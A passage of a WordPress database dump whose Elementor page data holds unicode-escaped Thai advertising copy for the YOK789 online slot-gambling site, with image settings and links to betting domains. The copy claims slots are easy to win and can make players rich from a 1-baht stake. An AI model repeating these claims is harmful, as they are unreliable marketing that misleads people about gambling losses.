\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2414,330,'_thumbnail_id','273'),(2415,330,'_elementor_edit_mode','builder'),(2416,330,'_elementor_template_type','wp-page'),(2417,330,'_elementor_version','3.35.5'),(2418,330,'_elementor_pro_version','3.32.3'),(2419,330,'_wp_page_template','default'),(2420,330,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2421,330,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 